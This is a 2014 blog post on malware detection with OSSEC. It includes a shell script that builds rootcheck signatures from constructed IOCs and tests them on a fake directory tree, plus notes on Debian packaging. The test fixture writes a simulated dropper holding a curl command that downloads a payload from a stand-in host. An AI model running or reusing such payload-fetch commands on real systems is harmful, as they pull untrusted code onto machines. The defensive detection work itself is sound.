Tuesday, September 23, 2014

OSSEC CON 2014 - Malware Detection with OSSEC

Happy to share my presentation from the OSSEC CON, which took place on September 16th in Cork, Ireland. Here you can find a brief explanation of different malware collection and analysis techniques, as well as a good example of how to use some IOCs to create a rootcheck signature.
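As an added example (not part of the talk, and not code from the OSSEC project), here is a small POSIX shell script that turns a handful of file and string IOCs into rootcheck signature lines and dry-runs them against a throwaway directory tree. The line layouts follow the shipped rootkit_files.txt ("path ! Name ::link", path relative to /) and rootkit_trojans.txt ("binary !regex! description") as I read those files; every IOC path, string, link and file content is constructed for illustration, and the dry run uses grep -E where rootcheck uses its own regex engine, so only literals and plain alternation are portable between the two.

```shell
#!/bin/sh
# Added example, not code from the talk or the OSSEC project: build rootcheck
# signature lines from a few IOCs and dry-run them against a throwaway
# directory tree. Layouts follow OSSEC's shipped rootkit_files.txt
# ("path ! Name ::link", path relative to /) and rootkit_trojans.txt
# ("binary !regex! description") as I read those files. Every IOC, path,
# link and file content below is constructed for illustration.

# One rootkit_files.txt line. Args: relative path, indicator name, reference.
rk_file_sig() { printf '%s ! %s ::%s\n' "$1" "$2" "$3"; }

# One rootkit_trojans.txt line. Args: binary name, regex, description.
# rootcheck uses its own regex dialect and this dry run uses grep -E, so
# stick to literals and '|' alternation, which both understand.
rk_trojan_sig() { printf '%s !%s! %s\n' "$1" "$2" "$3"; }

# Constructed IOC set, as if extracted from one sample's analysis.
file_sigs() {
  rk_file_sig 'tmp/.x/update.sh' 'Example dropper' 'https://example.invalid/r1'
  rk_file_sig 'dev/.x/mod.ko'    'Example LKM'     'https://example.invalid/r2'
}
trojan_sigs() {
  rk_trojan_sig 'ls'      '/dev/ttyop|\.x/lsfile' 'Trojaned ls'
  rk_trojan_sig 'netstat' '\.x/hidden_ports'      'Trojaned netstat'
}

# Dry-run rootkit_files checks: signature lines on stdin, root dir in $1.
# rootcheck tests each path under /; here it is tested under $1.
check_rk_files() {
  while IFS= read -r line; do
    case $line in ''|'#'*) continue ;; esac
    path=${line%% !*}        # text before " !"
    rest=${line#* ! }        # "Name ::link"
    name=${rest%% ::*}
    if [ -e "$1/$path" ]; then
      printf 'ROOTCHECK: %s found (%s)\n' "/$path" "$name"
    fi
  done
}

# Dry-run rootkit_trojans checks: signature lines on stdin, root dir in $1.
# The bin directories searched are an assumption kept short for the example.
check_rk_trojans() {
  while IFS= read -r line; do
    case $line in ''|'#'*) continue ;; esac
    bin=${line%% !*}         # text before " !"
    rest=${line#*!}          # "regex! description"
    regex=${rest%%!*}
    desc=${rest#*! }
    for d in bin sbin usr/bin usr/sbin; do
      f=$1/$d/$bin
      if [ -f "$f" ] && grep -qE -- "$regex" "$f"; then
        printf 'ROOTCHECK: trojaned /%s/%s (%s)\n' "$d" "$bin" "$desc"
      fi
    done
  done
}

# Constructed root tree: one dropped script, a clean ls and a trojaned ls.
make_fake_root() {
  mkdir -p "$1/tmp/.x" "$1/bin" "$1/usr/bin"
  printf 'curl http://example.invalid/p -o /tmp/.x/p\n' > "$1/tmp/.x/update.sh"
  printf 'ls binary, clean\n' > "$1/bin/ls"
  printf 'ls binary with /dev/ttyop inside\n' > "$1/usr/bin/ls"
}

# Run both signature sets against a root dir; findings come out one per line.
scan() {
  file_sigs | check_rk_files "$1"
  trojan_sigs | check_rk_trojans "$1"
}

demo() {
  root=$(mktemp -d)
  make_fake_root "$root"
  scan "$root"
  rm -rf "$root"
}
demo
```

On a default install the generated lines go into /var/ossec/etc/shared/rootkit_files.txt and rootkit_trojans.txt, where rootcheck picks them up on its next run. A bare path IOC is a weak signature on its own, since any benign file dropped at the same path will alert; where the sample allows it, pair the path entry with a content string from the trojans list so that both the location and the payload have to match.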



And, for those interested, here is the video as well:


Updated OSSEC Debian packages

Just published new versions, ossec-hids_2.8-2 and ossec-hids-agent_2.8-2, for the different Debian releases. They can be found here: http://ossec.alienvault.com/repos/apt/debian/pool/main/o/

Here are the changelogs:
 ossec-hids (2.8-2) stable; urgency=low  
  * Fixed Makefile to use ossec-hids-debian.init instead of ossec-hids.init (fixes LSB headers warning).  
  * Fixed CVE-2014-5284. Patch included.  
  * Included debconf and templates for initial package configuration (email_to, email_from and smtp).  
 ossec-hids-agent (2.8-2) stable; urgency=low  
  * Fixed Makefile to use ossec-hids-debian.init instead of ossec-hids.init (fixes LSB headers warning).  
  * Fixed CVE-2014-5284. Patch included.  
  * Included debconf and templates for initial package configuration (server_ip).  
The packaging itself lives in this GitHub repo: https://github.com/santiago-bassett/ossec-debian.git
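As an added example, and not the maintainer scripts from the repository above, here is one way a package can declare the agent's server_ip debconf question, preseed it for unattended rollouts, and have postinst validate the answer before it is written into ossec.conf. The question name ossec-hids-agent/server_ip, the default value and the rendered block are assumptions for illustration; only the debconf mechanics (templates file, db_get, debconf-set-selections) are the real ones.

```shell
#!/bin/sh
# Added example, not the maintainer scripts from the ossec-debian repo:
# declare a debconf question for the agent's server_ip, preseed it, and
# validate the answer before rendering it into ossec.conf. The question
# name, default and config block are assumptions for illustration.

# debian/ossec-hids-agent.templates (constructed).
agent_templates() {
  cat <<'EOF'
Template: ossec-hids-agent/server_ip
Type: string
Default: 127.0.0.1
Description: IP address of the OSSEC manager:
 The agent registers with and sends events to this manager. Enter an
 IPv4 address, not a hostname.
EOF
}

# Preseed line for debconf-set-selections, so a fleet of agents installs
# without prompting:  preseed_line 10.0.0.5 | debconf-set-selections
preseed_line() {
  printf 'ossec-hids-agent ossec-hids-agent/server_ip string %s\n' "$1"
}

# Accept only a dotted-quad IPv4 address. debconf stores whatever string it
# is given, and the value ends up inside XML written by root.
valid_ipv4() {
  case $1 in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  ifs=$IFS; IFS=.; set -- $1; IFS=$ifs
  [ $# -eq 4 ] || return 1
  for o in "$@"; do
    [ "$o" -le 255 ] || return 1      # each octet 0..255
  done
  return 0
}

# The <client> block postinst writes for the agent (hostnames would go in
# <server-hostname>, which this example deliberately does not accept).
render_client_block() {
  printf '<ossec_config>\n  <client>\n    <server-ip>%s</server-ip>\n  </client>\n</ossec_config>\n' "$1"
}

# Postinst body. When run as "postinst configure" on a Debian system the
# answer comes from debconf via db_get (a real postinst sources confmodule
# at the top of the script); otherwise $2 is used so the logic can be
# exercised as a dry run. Writes nothing and returns 1 on a bad value.
configure_agent() {
  if [ "$1" = configure ] && [ -r /usr/share/debconf/confmodule ]; then
    . /usr/share/debconf/confmodule
    db_get ossec-hids-agent/server_ip
    ip=$RET
  else
    ip=$2
  fi
  if ! valid_ipv4 "$ip"; then
    printf 'ossec-hids-agent: refusing server_ip "%s"\n' "$ip" >&2
    return 1
  fi
  render_client_block "$ip"
}

# Dry run: render the block for a constructed manager address.
configure_agent dry-run 10.0.0.5
```

Preseeding is what makes this worthwhile for agents deployed in bulk: feed `preseed_line` through `debconf-set-selections` before `apt-get install` and the package installs with no prompt and no hand-edited ossec.conf. The IPv4 check is there because debconf stores any string it is handed and postinst runs as root, so the answer should be validated like any other untrusted input before it lands in a config file.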

I also took the opportunity to update the generate_ossec.sh script, which now accepts the following arguments:
 santiago@debian-package:~# ./generate_ossec.sh -h  
 USAGE: Command line arguments available:  
 -h | --help Displays this help.  
 -u | --update Updates chroot environments.  
 -b | --build Builds debian packages.  
 -s | --sync Synchronizes with the debian repository.